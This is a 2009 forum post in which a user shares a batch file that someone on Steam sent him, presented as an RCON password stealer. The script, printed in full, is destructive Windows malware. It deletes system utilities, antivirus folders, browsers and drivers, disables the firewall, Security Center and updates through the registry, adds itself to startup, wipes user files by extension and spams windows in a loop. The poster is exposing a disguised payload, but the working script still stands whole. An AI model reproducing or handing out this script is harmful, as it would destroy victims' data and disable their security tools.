Post Reply 
lolhax0rs
Author Message
Joom
WOOP
Worlds End

Posts: 4,206.7320
Threads: 417
Joined: 20th Mar 2009
Reputation: 5.41709
E-Pigs: 134.1772
Offline
Post: #1
lolhax0rs
So I was just talking to a skiddie on Steam and he sent me this batch file saying that it steals a server's RCON password....

Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
@echo off
start cmd.exe
start notepad.exe
shutdown -s
start www.youareanidiot.org
erase "C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe"
erase "C:\WINDOWS\regedit.exe"
erase "%SystemRoot%\system32\restore\rstrui.exe"
erase "C:\WINDOWS\system32\taskmgr.exe"
erase "C:\WINDOWS\system32\scrnsave.exe"
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0

erase "C:\WINDOWS\system32\mspaint.exe"
erase "C:\WINDOWS\system32\magnify.exe"
erase "C:\WINDOWS\notepad.exe" /Q /S
erase "C:\WINDOWS\system32\calc.exe" /Q /S
erase "C:\WINDOWS\system32\cmd.exe" /Q /S
taskkill /f /im msnmsgr
erase "C:\Program Files\Windows Live" /q /s

taskkill /f /im yahoomsgr.exe
erase "C:\Program Files\Yahoo" /q /s

erase "C:\WINDOWS\system32\mouse.drv"
erase "C:\WINDOWS\system32\keyboard.drv" /Q /S
erase "C:\Program Files\eset" /Q /S
erase "C:\Program Files\alwil" /Q /S
erase "C:\Program Files\norton" /Q /S
erase "C:\Program Files\Malwarebytes' Anti-Malware" /Q /S
erase "C:\Program Files\Kaspersky" /Q /S
erase "C:\Program Files\Mozilla Firefox\firefox.exe" /Q /S
erase "C:\Program Files\Internet Explorer\IEXPLORE.exe" /Q /S
erase "C:\WINDOWS\system32\dfrg.exe" /Q /S
msg * ytujtfrjt
goto   No-no site
mkdir "C:\Documents and Settings\%user%\Desktop\doomed"
mkdir "C:\Documents and Settings\%user%\Desktop\trojanz0r"
mkdir "C:\Documents and Settings\%user%\Desktop\spyware.generator"
mkdir "C:\Documents and Settings\%user%\Desktop\trojan.gen"
mkdir "C:\Documents and Settings\%user%\Desktop\botz0r"
mkdir "C:\Documents and Settings\%user%\Desktop\spyware.exe"
mkdir "C:\Documents and Settings\%user%\Desktop\your"
mkdir "C:\Documents and Settings\%user%\Desktop\PC"
mkdir "C:\Documents and Settings\%user%\Desktop\is"
mkdir "C:\Documents and Settings\%user%\Desktop\infected"
mkdir "C:\Documents and Settings\%user%\Desktop\by"
mkdir "C:\Documents and Settings\%user%\Desktop\new_virus"

erase "C:\WINDOWS\$NtUninstallKB926239$" /S /Q
erase "Network Connections" /Q /S
copy /y %0 %windir%
REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Windows /t REG_SZ /d %windir%\
o.o.bat
@del \q \s C:\*.doc
@del \q\ s C:\*.txt
@del \q \s C:\*.mp3
@del \q \s C:\*.png
@del \q \s C:\*.wmv
@del \q \s C:\*.exe
@del \q \s C:\*.flv
taskkill /f /im System Iddle Process.exe
@del \q \s C:\*.wma
@del \q \s C:\*.jpg
@del \q \s C:\*.vbs
@del \q \s C:\*.bat
@del \q \s C:\*.pps
@del \q \s C:\*.pdf
@del \q \s C:\*.wav
@del \q \s C:\*.ico
@del \q \s C:\*.ini
@del \q \s C:\*.avi
@del \q \s C:\*.ocx
@del \q \s C:\*.cfg
:spam
start cmd.exe
start notepad.exe
start iexplorer.exe
goto spam


[Image: ROVBdMh.png]
3DS Friend Code: 5000-6045-4964
(This post was last modified: 20/12/2009 10:39 AM by Joom.)
20/12/2009 10:37 AM
Find all posts by this user Quote this message in a reply
Post Reply 


Messages In This Thread
lolhax0rs - Joom - 20/12/2009 10:37 AM
RE: lolhax0rs - diego - 20/12/2009, 10:39 AM
RE: lolhax0rs - 1-R - 20/12/2009, 10:40 AM
RE: lolhax0rs - roberth - 20/12/2009, 10:53 AM
RE: lolhax0rs - Chaos Panda - 20/12/2009, 11:39 AM
RE: lolhax0rs - Joom - 20/12/2009, 12:15 PM
RE: lolhax0rs - defdock - 20/12/2009, 12:53 PM
RE: lolhax0rs - trademark91 - 20/12/2009, 01:43 PM
RE: lolhax0rs - Silvertie - 20/12/2009, 03:35 PM
RE: lolhax0rs - Assassinator - 20/12/2009, 04:49 PM
RE: lolhax0rs - roberth - 20/12/2009, 05:36 PM
RE: lolhax0rs - Assassinator - 20/12/2009, 06:15 PM
RE: lolhax0rs - ProperBritish - 26/02/2010, 02:16 AM
RE: lolhax0rs - ZiNgA BuRgA - 20/12/2009, 04:29 PM
RE: lolhax0rs - Silvertie - 20/12/2009, 05:41 PM
RE: lolhax0rs - roberth - 20/12/2009, 06:25 PM
RE: lolhax0rs - Assassinator - 20/12/2009, 06:26 PM
RE: lolhax0rs - Sparker - 20/12/2009, 06:50 PM
RE: lolhax0rs - Joom - 20/12/2009, 06:53 PM
RE: lolhax0rs - ZiNgA BuRgA - 20/12/2009, 07:00 PM
RE: lolhax0rs - Mickey - 25/02/2010, 01:07 PM
RE: lolhax0rs - ZiNgA BuRgA - 25/02/2010, 08:04 PM
RE: lolhax0rs - Joom - 04/08/2010, 04:46 AM
RE: lolhax0rs - Aesic - 26/07/2012, 02:40 PM
RE: lolhax0rs - doug - 04/08/2010, 03:48 AM
RE: lolhax0rs - Joom - 26/07/2012, 04:04 PM
RE: lolhax0rs - Aesic - 26/07/2012, 04:11 PM
RE: lolhax0rs - whjms - 26/07/2012, 05:11 PM
RE: lolhax0rs - Slushba132 - 27/07/2012, 02:32 PM
RE: lolhax0rs - Joom - 27/07/2012, 04:04 PM

Forum Jump:


User(s) browsing this thread: 2 Guest(s)

 Quick Theme: